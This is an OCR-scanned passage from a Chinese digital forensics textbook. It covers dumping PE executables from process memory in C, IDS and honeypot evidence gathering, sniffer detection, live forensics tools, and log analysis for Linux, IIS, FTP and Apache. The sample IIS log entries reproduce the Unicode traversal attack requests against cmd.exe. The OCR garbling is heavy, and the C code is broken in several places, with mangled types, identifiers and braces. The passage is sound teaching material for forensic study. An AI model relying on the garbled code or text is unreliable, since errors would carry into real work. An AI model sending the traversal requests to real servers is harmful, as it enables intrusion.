DTB:0x0a039000 | | 页 表 目录 表 3 aa 
PDE# 511 页 表 
PEB:0x7ffdf000(v) | PTE# 991 FF PEB 
图 12.12 Windows 内 存 进程 的 页 表 信息 
表 12.4 XP SP2 系统 中 Eprocess 结构 元 素 
名 称 描 述 偏 移 数据 类 型 
DirectoryTableBase Directory Table Base 0xl18 Uint48 
CreateTime Process Creation Time 0x70 FILETIME 
UniqueProcessID Process Identifier 0x84 32 byte Int 
JImageFileName Executable Name 0xl174 String 
InheritedFromUniqueProcessID Parent Process Identifier 0xl4c 32 byte Int 
PEB Process Environment Block 0xlb0 32 bytes 
进程 在 内 存 中 以 页 面 为 单位 存储 数据 ,捕获 进程 并 分 析 内 存 , 利 用 Userdump 工具 来 获 


得 进程 的 内 存 数据 ,利用 Pmdump 获得 内 存 映 像 ,用 PARIER 收集 运行 进程 的 内 存 数 据 , 用 
Process Dumper 获得 进程 内 存 数 据 。 
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从 内 存 中 恢复 可 执行 文件 的 步骤 如 下 : 

(1) 从 PEB 结构 中 获得 可 执行 文件 在 内 存 中 的 起 始 地 址 ; 

(2) 从 可 执行 文件 的 起 始 地 址 处 读 PE 头 ; 

(3) 根据 PE 头 中 的 内 容 可 得 到 可 执行 文件 各 个 节 的 地 址 和 大 小 ; 

(4) 根据 PE 头 中 获得 各 个 PE 节 的 信息 ,从 内 存 页 面 中 进行 提取 ,然后 重组 成 一 个 
莹 人 5 

Dump 可 执行 文件 的 参考 函数 如 下 : 


unsigned char * DumpPe (HANDLE hhProcess, unsigned char * szAgddress, int * iLen) 


{ // 主 功能 函数 ,Dump 内 存 中 的 王 文 件数 据 
PIMAGE, DOS_HEADER pDos; //MS- DOS 头 

PIMAGE, NT HEADERS pNt; /ANT 映 象 头 

PIMAGE, SECTION HEADER psection; // 区 块头 

unsigned char szHeader[8192], * szSection; 

DWORD dwRet; 


// 从 指定 的 地 址 szaddress 读 进程 内 存 内 容 到 szHeader 

if (!ReadProcessMemory (hhProcess, (LEVOID) szAddress, (LPVOID) szHeader, sizeof (szHeader), 
NULD) ) 

return FALSE; 

// 通 过 文件 头 两 个 字 节 是 否 等 于 Mz 来 判断 是 否 为 BE 文件 

if (memcmp (szHeader, "Mz", 2)) 

{ 

return FALSE; 

} 

printf ("映像 在 0x%p\n",，szAddress); 

PDos= (PIMAGE DOS HEADER) szHeader; 

//MS- DOS 头 的 最 后 一 个 成 员 e lfanew 指 向 NT 映像 头 

PNt= (PIMAGE NT HEADERS) (szHeader+pDos- >e lfanew); 

// 获 得 所 需 分 配 内 存 空间 的 大 小 

* iLen=pNt- >OptionalHeader.SizeOfImage+ pNt- >OptionalHeader.SizeOfHeaders+ PageSize(); 
// 分 配 虚拟 内 存 空间 , 注意 后 面 的 保护 属性 为 PAGE_READWRITE 

if (! (dwRet= (DWORD)VirtualAlloc (NULL, 

PNt- >OptionalHeader .SizeOfImage+pNt- > OptionalHeader .SizeOfHeaders+ PageSize(), 

MEM RESERVE |MEM COMMIT, PAGE READWRITE))) 

{ 

printf ("$d\n", GetLastError ()) 7 

printf(" 不 能 分 配 有 效 内 存 \n"); 

return FALSE; 

} 

// 打 印 Dump 的 姬 头 重要 信息 
printf("DUMPING 头 : \t"" 头 大 小 : 0x8sp\t"" 虚拟 地 址 : 0x8sp\t"" 映像 地 址 : 0x%sp\n", PNt- > 

OptionalHeader.SizeOfHeaders, szAddress, 0); 

memcpy ( (char * )dwRet, szHeader, pNt— >OptionalHeader.SizeOfHeaders); 
pSection= IMAGE FIRST SECTION (pNt); 

for(int i=0; i< pNt- >FileHeader .NumberOfSections; i++) 
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{ // 打 印 Dump 的 亚 块 信息 

printf ("DUMPING 块 #%d…\n", i); 

printf(" 块 大 小 : 0x%p\n", pSection[i] .SizeofRawData); 

printf(" 虚拟 地 址 : 0xsp\n"，szaddress+pSection[i] .VirtualAgddress); 
printf(" 映像 地 址 : 0xsp\n"，dwRet+PpSection[i] .PointerToRawData) 7 

if (!(szSection= (unsigned char* )VirtualAlloc (NULL, pSection[i].Misc.VirtualsSize, 
MEM RESERVE | MEM COMMIT, PAGE, READWRITE))) 

{ 

printf(" 不 能 分 配 有 效 内 存 \n"); 

return FALSE; 

} 

// 从 进程 内 存 里 读 映 像 块 

if (!ReadProcessMemory (hhProcess, szAddress+pSection[i] .VirtualAgddress, 
szSection, pSection[i] .Misc.VirtualSize, NULL)) 

{ 

printf(" 不 能 读 取 映像 块 \n"); 

return FALSE; 


memcpy ((char * ) dwRet + pSection [i]. PointerToRawData, szSection, pSection [i]. Misc. 
VirtualSize); 
VirtualFree (szSection, 0, MEM RELEASE); // 释 放 申 请 到 的 内 存 


return (unsigned char * )dwRet; 


void Dumpaddress (HANDLE process, DWORD address, unsigned char * pe, int len, int pid) 
//Dump 内 存 地 址 

char szFileName [MAX_PATH], * szMouduleName=NULL; 

szMouduleName= GetModuleName (process, address); // 获 取 模 块 名 

if (!szMouduleName) { 

szMouduleName= strdup ("未 知 模块 .txt"); 

} 

memset (szFileName, 0, MAX PATH); 

// 按 照 "PID- 内 存 地 址 -模块 名 .dat" 构造 磁盘 文件 名 

sprintf (szFileName, "%d- $p-%s.dat", pid, address, szMouduleName); 

free (szMouduleName); // 释 放 strup () 申 请 来 的 资源 
WritePeDump (szFileName, pe, len); // 写 BE Dump 结果 到 磁盘 

} 

void WritePeDump (char * outfile, unsigned char* pe, int len) // 写 到 磁盘 文件 中 
{ 

HANDLE hFile=NULL; 

DWORD cbWritten; 

printf ("开始 写 到 文件 …\n"); 

hFile=CreateFile (outfile, GENERIC WRITE, 0, NULL, CREATE ALWAYS, 

FILE ATTRIBUTE NORMAL, NULL); // 创 建文 件 ,具有 写 属性 
if (hFile==INVALID HANDLE VALUE){ 
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Printf(" 创 建文 件 错误 \n"); 


return; 

FE 

WriteFile (hFile, pe, len, gcbWritten, NULL); // 写 文件 操作 

if (len != cbWritten){ // 校 验 写 文件 操作 是 否 正确 


printf(" 写 入 文件 时 错误 \n"); 
} 
} 


12.4.3 动态 取证 


动态 取证 是 结合 人 侵 检测 等 网 络 安全 工具 和 网 络 体系 结构 ,捕获 入 侵 动 态 数据 ,在 犯罪 
发 生 中 进行 实时 取证 ,其 证 据 具有 实时 性 和 连续 性 ,结合 人 侵 前 后 的 网 络 环境 可 再 现 人 侵 过 
程 。 其 过 程 具有 智能 性 与 多 样 性 ,取得 的 电子 证 据 更 具有 说 服 力 与 法 律 效 力 。 

1. 利用 IDS 取证 

把 IDS 与 取证 工具 结合 ,往往 能 对 网 络 攻击 进行 取证 并 得 到 响应 。 

(1) 确认 攻击 。 确 认 攻 击 是 响应 的 第 一 步 , 主 要 方法 是 查找 攻击 留 下 的 痕迹 。 检 查 的 
主要 内 容 有 : 

。 寻找 嗅 探 器 (如 sniffer); 
寻找 远程 控制 程序 (如 netbus、back orifice); 

。 寻找 黑客 可 能 利用 的 文件 共享 或 通信 程序 (如 eggdropirc); 

。 寻找 特权 程序 (如 find/-perm-4000-print); 

。 寻找 未 授权 的 服务 (如 netstat -a、check inetd. conf) ; 

。 寻找 异常 文件 (考虑 系统 磁盘 大 小 ); 

。 检查 文件 系统 的 变动 ; 

。 检查 口令 文件 的 变动 并 寻找 新 用 户 ; 

。 核对 系统 和 网 络 配置 (特别 注意 过 滤 规 则 )， 

。 检查 所 有 主机 (特别 是 服务 器 ) 。 

(2) 取证 过 程 。 取 证 过 程 取决 于 取证 目的 。 取 证 的 目的 可 能 是 观察 研究 攻击 者 ,也 可 
能 是 跟踪 并 驱赶 攻击 者 ,或 者 捕 俘 攻击 者 ,或 者 是 准备 起 诉 攻击 者 。 

@ 取证 时 启动 必要 的 法 律 程序 。 

@ 首先 对 系统 进行 完全 备份 ,包括 磁盘 数据 和 内 存 数 据 。 用 tcpdump 做 完全 的 分 组 日 
志 ;* 有 关 协 议 分 组 的 来 龙 去 脉 ;一 些 会 话 ( 如 telnet rlogin IRC 和 FTP 等 ) 的 可 能 内 容 。 

@ 根据 情况 有 选择 地 关闭 计算 机 系统 。 彻 底 关 闭 系 统 可 能 造成 信息 改变 和 证 据 破 坏 ， 
因此 不 能 彻底 关闭 系统 ,也 不 断 开 网 络 ;将 系统 备份 转移 到 单 用 户 模式 下 制作 和 验证 备份 ; 
最 好 考虑 制作 磁盘 镜像 ,或 者 同步 磁盘 ;或 者 暂停 系统 。 

@ 调查 攻击 者 来 源 。 利 用 工具 分 析 攻 击 者 的 IP, 利 用 tcpdump/who/syslog 进行 查询 
或 分 析 ,或 运行 finger 对 抗 远 程 系统 ;寻找 攻击 者 可 能 利用 的 账号 。 

2. 利用 密 缸 取证 

蜜 钠 是 一 种 在 互联 网 上 专门 为 吸引 并 “诱骗 "那些 试图 非法 问 入 他 人 计算 机 系统 的 人 
(如 电脑 黑客 ) 而 设计 的 。 蜜 饶 系 统 是 一 种 包含 漏洞 的 诱骗 系统 ,通过 模拟 一 个 或 多 个 易 受 
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数字 取证 技术 


攻击 的 主机 ,给 攻击 者 一 个 容易 攻击 的 目标 。 蜜 炙 并 没有 向 外 界 提供 真正 有 价值 的 服务 , 因 
此 所 有 的 连接 都 会 被 认为 是 可 疑 的 。 蜜 镀 的 另 一 个 用 途 是 拖延 攻击 者 对 真正 目标 的 攻击 。 

蜜 饶 技 术 可 疑 对 防火 墙 和 其 他 人 侵 检测 系统 等 安全 解决 方案 起 到 一 定 的 补充 作用 , 提 
供 先 进 诱骗 技术 和 早期 检测 感应 器 。 利 用 蜜 饶 进 行 取 证 分 析 的 一 些 原则 和 步骤 如 下 : 

(1) 获取 入 侵 者 信息 。 

(2) 获取 关于 攻击 的 信息 。 如 攻击 的 手段 .日 期 和 时 间 ; 入 侵 者 添加 的 文件 或 账号 密 
码 ; 安 装 的 嗅 探 器 ;是 否 安装 有 rootkit 或 木马 程序 等 。 

(3) 建立 事件 的 时 间 序 列 。 

(4) 事故 费用 分 析 。 

(5) 向 管理 层 媒体 以 及 法 庭 提 交 相 应 的 报告 。 

3. 网 络 监听 

网 络 监听 的 目的 是 截获 通信 的 内 容 , 监 听 的 手段 是 对 协议 进行 分 析 。 网 络 监听 可 以 在 
网 上 的 任何 一 个 位 置 实施 ,但 监听 效果 最 好 的 地 方 是 在 网 关 、 路 由 器 .防火墙 一 类 的 设备 上 
(通常 由 网 络 管理 员 来 操作 ) 。 

Sniffer( 嗅 探 器 ) 属 于 第 二 层次 的 攻击 ,能 捕获 到 达 本 机 端口 的 报 文 ,捕获 网 段 上 所 有 报 
文 的 前 提 条 件 是 : 网 段 必须 是 共享 以 太 网 ,本 机 网 卡 设置 为 混杂 模式 。Sniffer 只 能 抓 取 一 
个 物理 网 段 内 的 包 , 即 监听 者 与 监听 的 目标 中 间 不 能 有 路 由 (交换 ) 或 其 他 屏蔽 广播 包 的 设 
备 ;不 能 监听 拨号 上 网 用 户 。 

检测 网 络 监听 的 步骤 如 下 : 

(1) 向 怀疑 目标 网 络 发 送 大 量 垃圾 数据 报 , 检 查 响 应 时 间 是 否 明显 延迟 ; 

(2) 在 DNS 系统 上 观测 有 没有 明显 增多 的 DNS 解析 请 求 。 

(3) 用 正确 的 IP 地 址 和 错误 的 物理 地 址 ping ,正常 机 器 不 接收 。 

(4) 向 局 域 网 内 的 主机 发 送 非 广播 方式 的 ARP 包 , 如 果 响 应 则 可 能 在 监听 。 

防范 网 络 监听 的 措施 有 确保 网 段 内 主机 无 漏洞 ;采用 加 密 通 信 ; 考 虑 Kerberos 或 CA 
认证 ;使 用 交换 机 以 及 一 次 性 口令 技术 。 


12.4.4 实时 取证 


实时 取证 首先 要 进行 需求 分 析 ,利用 格式 识别 技术 寻找 指定 格式 文件 ,利用 特征 码 识别 
技术 、 高 速 匹配 扫描 技术 寻找 指定 功能 文件 ,利用 格式 还 原 技术 、 内 容 抽取 技术 和 高 速 匹配 
技术 寻找 指定 内 容 文件 。 

特征 码 是 描述 某 物质 或 程序 代码 的 典型 特征 的 代码 ,可 以 由 多 个 特征 组 成 ,许多 特征 码 
形成 特征 数据 库 , 是 查 杀 病毒 或 特征 程序 的 基本 依据 。 特 征 码 主要 分 为 文件 特征 码 、 内 存 特 
征 码 和 行为 特征 码 , 又 可 分 为 单一 特征 码 和 复合 特征 码 。 

程序 运行 时 ,在 内 存 中 为 完成 特定 的 动作 ,需要 特殊 的 指令 ,或 者 同一 内 存 地 址 或 一 段 
连续 地 址 的 指令 是 相同 的 ,就 构成 一 个 内 存 功能 特征 。 为 了 防止 误 判 ,可 以 提取 出 多 段 特 征 
码 , 即 复 合 特征 码 。 

取证 技术 是 一 个 非常 广阔 的 领域 ,研究 人 侵 现场 分 析 中 寻找 恶意 代码 或 分 析 数据 破坏 
是 否 由 病毒 造成 等 。 而 反 病 毒 技 术 是 以 一 定 的 内 容 和 行为 识别 方法 为 基础 ,通过 一 组 引擎 
的 运行 ,验证 被 检测 对 象 是 否 符合 某 种 指定 内 容 或 者 行为 描述 ,或 其 组 合 ,从 而 判别 被 检测 
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对 象 是 否 为 病毒 的 技术 ,目的 是 验证 程序 的 "有 害 性 ”。 从 表 观 上 看 ,取证 领域 的 部 分 技术 与 
病毒 检测 技术 有 类 似 之 处 。 首 先 ,相关 的 取证 技术 的 部 分 环节 与 反 病 毒 产品 的 性 质 一 样 , 需 
要 在 大 量 的 数据 中 确定 其 中 符合 某 种 定义 的 信息 的 存在 。 其 次 ,从 广义 的 理论 领域 来 说 ,都 
可 以 视 为 信息 指纹 技术 的 相关 分 支 。 取 证 系统 需要 更 深入 的 关联 分 析 , 取 证 技术 最 终 是 要 
确定 某 个 事件 背后 的 逻辑 关系 。 

实时 取证 的 具体 步骤 如 下 : 

(1) 保存 内 存 易 失 性 数据 。 利 用 工具 获取 整个 内 存 数据 ,如 PsTools 套件 中 的 pslist 程 
序 , Helix (www. e-fense. com/helix)、Nigilant, 商用 的 远程 取证 工具 ProDiscoverIR、 
OnlineDFS/LiveWire 等 可 以 获取 远程 系统 的 整个 内 存 数据 。 

(2) 收集 目标 系统 的 信息 与 环境 。 包 括 系 统 日 期 和 时 间 、 系 统 标 识 符 ( 计 算 机 名 、IP 地 
址 ) ,操作 系统 版 本 、 补 丁 级 别 , 硬 件 、 用 户 信 息 、 网 络 配 置 (IP 地 址 、VPN)、 系 统 已 激活 的 服 
务 和 协议 等 。 参 考 工具 有 psinfo、 systeminfo、Dumpwin、Promiscdetect、 Promqry 和 
URLProtocolView 等 。 

(3) 识别 登录 到 当前 系统 的 用 户 。 调 查 用 户 名 登录 位 置 登录 Session 的 持续 时 间 ,该 
用 户 访问 的 共享 文件 或 其 他 资源 .和 该 用 户 关联 的 进程 .该 用 户 引起 的 网 络 活动 。 参 考 工 具 
PsTools 套件 中 的 Psloggendon .Quser。 

(4) 检查 网 络 连接 和 活动 。 包 括 网 络 连接 情况 .最 近 的 DNS 请 求 . 目 标 系统 的 
NetBIOS 名 字 表 、ARP 缓存 以 及 内 部 路 由 表 、 关 联 开放 端口 及 其 活动 进程 。 参考 工具 
Netstat .nmap。 

(5) 收集 进程 信息 。 从 最 基本 的 信息 进程 名 和 ID 开始 ,收集 临时 上 下 文 环境 、 内 存 消 
耗 .可 执行 程序 镜像 的 进程 .用户 镜 像 的 进程 . 子 进程 .调用 库 和 依赖 库 . 用 来 创建 进程 的 命 
令 行 参 数 . 相 关联 的 句柄 .进程 的 内 存 内 容 .与 系统 状态 和 残留 环境 相关 的 上 下 文 环境 。 参 
考 工具 有 tlist 程序 ,tasklist 程序 .PRCView. exe 和 NC. EXE。 

(6) 检查 服务 和 驱动 程序 。 尽 管 服务 对 终端 用 户 是 透明 的 ,在 系统 后 台 运 行 ,恶意 软件 
也 就 可 以 以 自 运行 方式 在 后 台 运 行 , 导 致 用 户 难以 发 现 。 参 考 工具 Psservice。 

(7) 检查 打开 的 文件 。 通 过 打开 的 文件 判断 目标 系统 感染 的 恶意 代码 的 类 型 ,或 实际 
需要 调用 的 和 操作 的 服务 与 资源 。 参 考 工具 有 OpenFilesView( 本 地 ) 和 psfile( 远 程 ) 。 

(8) 收集 命令 和 历史 记录 ,识别 共享 ,检查 计划 任务 。UNIX 使 用 bash 命令 行 来 维护 
shell 的 历史 命令 , Win OS 可 以 从 cmd 中 使 用 doskey /history 命令 来 找 回 存在 内 存 中 的 命 
令 。 网 络 共享 是 入 侵 和 传播 恶意 代码 的 重要 方式 和 途径 ,计划 任务 可 发 起 事件 驱动 攻击 或 
启动 隐藏 程序 。 

(9) 收集 剪贴 板 内 容 和 相关 文件 。 在 潜在 的 受 攻击 计算 机 上 ,剪贴 板 的 内 容 可 能 为 辨 
别 受 攻击 的 类 型 和 方式 提供 了 一 些 重 大 线索 。 需 要 对 实时 系统 中 的 文件 数据 或 者 注册 表 进 
行 选择 性 的 取证 保存 和 分 析 。 参 考 工 具 pclip。 

(10) 适用 于 Windows 的 时 间 响 应 工具 套件 。 

Windows Forensic Toolchest(WFT) 通 过 多 种 工具 为 一 致 性 信息 收集 提供 了 一 个 框 
架 。WFT 可 配置 以 自动 方式 或 者 特定 的 顺序 来 运行 任何 工具 。WFT 将 获取 的 数据 生成 
MD5 值 ,并 为 数据 收集 过 程 提供 支撑 的 审计 信息 报告 。 但 WFT 不 能 列举 被 删除 的 文件 ， 
还 有 一 个 明显 缺陷 是 其 需要 依赖 受害 主机 的 操作 系统 。 
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数字 取证 技术 


ProDiscoverIR 是 一 款 商 业 的 取证 工具 ,不 依赖 于 目标 操作 系统 ,但 要 在 目标 系统 中 运 
行 代理 程序 。 

OnlineDFS/LiveWire 是 在 线 数 字 取 证 工具 套件 。 具 备 从 远程 计算 机 中 获取 易 失 性 数 
据 的 能 力 ,并 且 可 以 从 远程 计算 机 中 获取 目标 系统 的 整个 内 存 转 储 以 及 整个 硬盘 的 司法 
拷贝 。 


12.4.5 事后 取证 


事后 取证 是 攻击 事件 已 经 完成 后 的 取证 ,一 般 从 系统 被 动 安装 的 程序 .打开 或 修改 的 文 
件 或 日 志 分 析 入 手 取证 ,相对 实时 取证 难以 取得 证 据 。 

首先 从 计算 机 系统 中 搜索 发 现 并 提取 恶意 软件 ,包括 已 知 的 恶意 软件 .新近 安装 的 程序 
或 以 前 安装 但 被 更 改 的 程序 ;搜索 预 取 文 件 、 检 查 可 执行 文件 ;检查 服务 、 自 启动 项 ,计划 任 
务 ; 审 查 日 志 , 检 查 用 户 账户 ;检查 文件 系统 、 注 册 表 、 还 原点 ;检查 文件 的 MD5 或 SHA1 密 
码 学 散 列 值 来 确认 是 否 正确 ;在 硬盘 上 进行 关键 词 搜 索 ,追踪 定位 可 疑 文件 ,找到 受害 计算 
机 中 的 可 疑 程序 和 异常 文件 ;发 现 隐藏 技术 的 文件 ;备份 特定 的 重要 文件 ,对 可 疑 文 件 头 部 
进行 分 析 。 


12.5 电子 证 据 分 析 


经 过 电子 证 据 的 收集 ,取证 人 员 会 得 到 大 量 的 数据 信息 ,这 些 原始 的 数据 信息 经 过 数字 
签名 并 加 盖 时 间 惟 后 ,由 专用 的 、 安 全 的 VPN 通道 传送 至 证 据 服务 器 。 

电子 证 据 分 析 是 通过 在 电子 证 据 的 数据 流 或 信息 流 中 寻找 .匹配 关键 词 或 关键 短语 ,以 
及 对 数据 中 包含 的 系统 曾 进行 的 Internet 访问 的 URL、E-mail 交流 的 邮件 地 址 进行 基于 模 
糊 逻 辑 的 分 析 来 试图 发 现 电子 证 据 与 犯罪 事实 之 间 的 客观 联系 。 

从 大 量 原始 证 据 中 搜索 .匹配 关键 字 和 特征 是 证 据 分 析 的 主要 技术 。 具 体 包括 文件 属 
性 分 析 技术 ,文件 数字 摘要 分 析 技术 .日 志 分 析 技 术 、 根 据 已 获得 的 文件 或 数据 的 用 词 .语法 
和 写作 风格 推断 可 能 作者 的 分 析 技术 ,发掘 同一 事件 的 不 同 证 据 间 联 系 的 分 析 技术 ,数据 解 
密 技 术 、 密 码 破译 技术 、 对 电子 介质 中 的 被 保护 信息 强行 访问 技术 等 。 这 里 主要 讨论 日 志 分 
析 和 电子 数据 来 源 分 析 。 


12.5.1 日 志 证 据 分 析 


日 志 分 析 是 从 海量 的 原始 日 志 证 据 中 发 现 与 人 侵 攻击 相关 的 、 反 映 案件 客观 事实 的 证 
据 信息 。 通 过 手工 或 借助 相应 的 日 志 分 析 工具 对 系统 文件 进行 详细 的 审查 ,可 以 了 解 入 侵 
过 程 中 攻击 者 执行 了 哪些 操作 ,以 及 哪些 远程 主机 访问 了 你 的 主机 。 但 是 系统 中 的 任何 日 
志文 件 都 可 能 被 入 侵 者 改动 过 ,一 旦 入 侵 者 获得 了 系统 root 权限 ,就 可 以 轻易 地 破坏 或 删 
除 操作 系统 所 保存 的 日 志 记 录 , 从 而 掩盖 他 们 留 下 的 痕迹 。 

1. Linux 日 志 分 析 

命令 : 

less /var/log/messages; 文本 显示 文件 内 容 ; 

tail -f /var/log/messages; 文本 显示 文件 最 后 10 行 内 容 ; 
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dmesg|more 将 以 分 页 的 方式 显示 引导 信息 ; 
logrotate 将 取得 当前 版 本 的 日 志文 件 ,然后 在 这 个 文件 名 最 后 附加 一 个 “. 1”; 


man /etc/syslog.conf 查看 系统 日 志 的 配置 。 


2. Windows 日 志文 件 分 析 

单 击 “开始 ”设置 ”~ 控制 面板 ”> 管理 工具 ”事件 查看 器 ”, 在 事件 查看 器 窗口 
左 栏 中 列 出 本 机 包含 的 日 志 类 型 ,如 应 用 程序 .安全 和 系统 等 。 

双击 其 中 某 个 记录 ,弹出 “事件 属性 ”对 话 框 ,显示 出 该 记录 的 详细 信息 。 

LogParser 是 一 款 强大 的 工具 ,可 以 用 来 检查 大 部 分 Windows 日 志 , 包 括 微 软 的 事件 日 志 。 

3. IIS 日 志 分 析 

W3C 扩充 日 志文 件 格 式 可 以 指定 每 天 记录 客户 IP 地 址 ,用户 名 、 服 务 器 端口 .方法 、 
URI 资源 .URI 查询 ,协议 状态 、 用 户 代 理 ,每 天 要 审查 日 志 。 下 面 列 举 说 明日 志文 件 的 部 
分 内 容 ( 每 个 日 志文 件 都 有 如 下 的 头 4 行 )， 


#Software: Microsoft Internet Information Services 6.0(IIS 组 件 版 本 ) 

#Version: 1.0( 版 本 号 ) 

#Date: 2007- 09- 21 02:38:17 (服务 启动 时 间 ) 

#Fields: date time s- sitename s- ip cs-method cs-uri- stem cs-Uri- query s- port cs- username 
c- ip cs (User- Agent) sc- status sc- substatus sc- win32- status (每 条 记录 的 记录 项 格式 说 明 ) 


例如 记录 : 


2007- 09- 21 01:10:51 10.152.8.17 -10.152.8.2 80 GET /seek/images/ip.gif - 200 Mozilla/5.0+ 
(X11;+U;+Linux+ 2.4.2- 2+i686;+en- US;+0.7) 


说 明了 远程 客户 端的 连接 时 间 为 2007-09-21 01:10:51;IP 地 址 为 10. 152. 8. 17 - 10. 
152. 8. 2; 端 口 为 80; 请 求 动作 为 GET /seek/images/ip. gif ;返回 结果 为 一 200( 如 页 面 不 存 
在 则 返回 404) ;浏览 器 类 型 为 Mozilla/5. 0 十 ;系统 等 相关 信息 X11; 十 U; 十 Linux 十 2. 4. 2- 
2 十 i686; 十 en-US; 十 0.7 等 。 

4. FTP 日 志 分 析 

IIS 的 FTP 日 志文 件 默 认 位 置 为 % ep ye gi en 
(没有 自 定义 位 置 ), 和 TIS 的 WWW 日 志 一 样 ,也 是 默认 每 天 一 个 日 志 。FTP 日 志 也 是 文 
本 文件 ,命名 格式 是 “ex 十 年 份 的 末 两 位 数字 十 月 份 十 日 期 ", 如 2007 年 8 月 10 日 的 WWW 
日 志文 件 是 ex070810. log。 下 面 列举 日 志文 件 的 部 分 内 容 


#Software: Microsoft Internet Information Services 6.0(IIS 组 件 版 本 ) 

#Version: 1.0 (版 本 ) 

#Date: 2004- 07- 24 01:32:07 (服务 启动 时 间 ) 

#Fields: time cip csmethod csuristem scstatus (记录 域 :时 间 、IP. 访 问 方法 、 用 户 名 和 状态 ) 


例如 记录 : 


03:15:20 210.12.195.2 [1]USER 1zy 331 
(IP 地 址 为 210.12.195.2, 用 户 名 为 1zy 的 用 户 试图 登录 ) 
03:16:12 210.12.195.2 [1]PASS - 530 (在 03:16:12 登录 失败 ) 


一 432 


数字 取证 技术 


03:19:16 210.12.195.2 [1]USER administrator 331 

(在 03:19:16 用 户 名 为 aaministrator 的 用 户 试图 登录 ) 
03:19:24 210.12.195.2 [1]PASS -230 (登录 成 功 ) 
03:19:49 210.12.195.2 [1]MKD brght 550 (新 建 目录 失败 ) 
03:25:26 210.12.195.2 [1]QUIT - 550 (退出 FTP 程 序 ) 


通过 这 段 FTP 日 志文 件 的 内 容 可 以 看 出 ,来 自 IP 地 址 210.12. 195. 2 的 远程 客户 端 从 
2004 年 7 月 24 日 3: 15 开 始 试图 登录 此 服务 器 ,先后 换 了 两 次 用 户 名 和 口令 才 成 功 ,最 终 
以 administrator 的 账户 成 功 登 录 。 应 该 警惕 administrator 账户 是 否 被 破解 了 ,为 了 安全 考 
虑 ,应 该 更 换 此 账户 的 密码 或 者 重新 命名 。 

如 果 有 人 曾经 利用 过 UNICODE 漏洞 入 侵 过 ,在 日 志 里 会 有 如 下 类 似 记录 : 


13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd" .exe 401 
13:46:07 127.0.0.1 GET /scripts/..\../winnt/system32/cmd" .exe 200 


如 果 有 人 曾经 执行 过 copy、del、echo 和 . bat 等 具有 入 侵 行 为 的 命令 时 ,会 有 如 下 类 似 
记录 : 


13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd" .exe 401 
13:47:37 127.0.0.1 GET /scripts/..\../winnt/system32/cmd" .exe 502 


5. Apache 日 志 分 析 

如 果 apache 的 安装 是 采用 默认 的 配置 ,那么 在 /logs 目录 下 就 会 生成 两 个 文件 ,分 别 是 
access_log 和 error_log。access_log 为 访问 日 志 , 记 录 所 有 对 apache 服务 器 进行 请 求 的 访 
问 , 它 的 位 置 和 内 容 由 CustomLog 指令 控制 ,LogFormat 指令 可 以 用 来 简化 该 日 志 的 内 容 
和 格式 。error_log 为 错误 日 志 , 记 录 下 任何 错误 的 处 理 请 求 , 它 的 位 置 和 内 容 由 ErrorLog 
指令 控制 ,通常 服务 器 出 现 什么 错误 ,首先 对 它 进行 查阅 ,是 一 个 最 重要 的 日 志文 件 。 

用 tail 打开 一 个 access_log 文件 ,下 面 是 一 条 经 典 的 访问 记录 : 


218.19.140.242 - - [10/Dec/2010: 09: 31:17+ 0800] "GET /query/trendxml/district/ todayreturn/ 
month/2009- 12- 14/2010- 12- 09/haizhu tianhe.xml HTTP/1.1" 200 1933 "- " "Mozilla/5.0 (Windows; 
U; Windows NT 5.1; zh- CN; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 (.NET CLR 3.5.30729)" 


说 明 : 请 求 apache 服务 器 的 客户 端 IP 为 218. 19. 140. 242( 远 程 主机 的 IP 地 址 ,也 可 
能 是 代理 地 址 ) ;第 一 个 "-" 是 identd 的 客户 端 ,一 般 为 空 ; 第 二 个 "-" 是 记录 用 户 HTTP 的 
身份 验证 ,一 般 也 为 空 ;第 四 项 是 记录 请 求 的 时 间 ,格式 为 [day/month/year: hour:minute: 
second zone], 十 0800 表示 服务 器 所 处 的 时 区 为 东 八 区 ; "GET /.. haizhu_tianhe. xml 
HTTP/1. 1" 是 一 项 最 有 用 的 信息 ,表示 服务 器 收 到 的 是 一 个 GET 请 求 ,以 及 请 求 的 资源 
路 径 和 协议 HTTP/1. 1;200 是 一 个 返回 状态 码 ,表示 请 求 是 否 成 功 . 重 定向 .错误 ,这 项 值 
以 2 开头 的 表示 请 求 成 功 ,以 3 开头 的 表示 重 定向 ,以 4 开头 的 标示 客户 端 存在 某 些 错误 ， 
以 5 开头 的 标示 服务 器 端 存在 某 些 错误 ;1933 表示 服务 器 向 客户 端 发 送 了 多 少 字 节 的 数据 
量 ;"Mozilla/5.0...(. NET CLR 3. 5. 30729)" 表 示 客 户 浏览 器 版 本 与 环境 信息 。 

用 tail 打开 error_log ,查看 记录 如 下 : 


[Fri Dec 10 15:03: 59 2010] ;error 404] [client 218.19.140. 242] File does not exist: /home/ 
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htmlfile/tradedata/favicon.ico 


第 一 项 记录 错误 发 生 的 时 间 , 并 给 出 了 星期 几 ;第 二 项 是 错误 的 级 别 404; 第 三 项 是 客 
户 端 的 IP 地 址 ;最 后 是 错误 的 具体 信息 File does not exist: /home/ htmlfile/tradedata/ 
favicon. ico。 

6. 日 志 分 析 工 具 

如 果 入 侵 者 技术 比较 高 明 ,会 删除 IIS 日 志文 件 以 抹 去 痕迹 ,这 时 可 以 到 事件 查看 器 看 
来 自 W3SVC 的 警告 信息 ,往往 能 找到 一 些 线索 。 对 于 访问 量 特别 大 的 Web 服务 器 ,数据 
太 多 了 , 仅 靠 人 工分 析 几 乎 是 不 可 能 的 。 可 以 借助 第 三 方 日 志 分 析 工 具 , 如 Faststs 
Analyzer Logs2Intrusions v. 1.0 等 。Logs2Intrusions 是 一 个 由 Turkish Security Network 
公司 开发 的 自由 软件 ,是 免费 的 日 志 分 析 工 具 , 可 以 分 析 IIS 4/5、Apache 和 其 他 日 志文 件 ， 
下 载 网 址 为 http://www. trsecurity. net/logs2intrusions。 而 AWStats 是 sourceforge. net 
上 很 有 名 的 Web/Mail/FTP 服务 器 日 志文 件 分 析 工 具 。 


12.5.2 电子 证 据 来 源 分 析 与 鉴定 


电子 证 据 来 源 分 析 即 审查 和 鉴定 数据 的 来 源 。 审 查 包括 证 据 的 合法 性 和 证 明 能 力 审 
查 ,审查 的 过 程 可 能 需要 鉴定 。 合 法 性 即 审查 证 据 是 否 符 合 证 据 要 求 , 包 括 计 算 机 系统 自身 
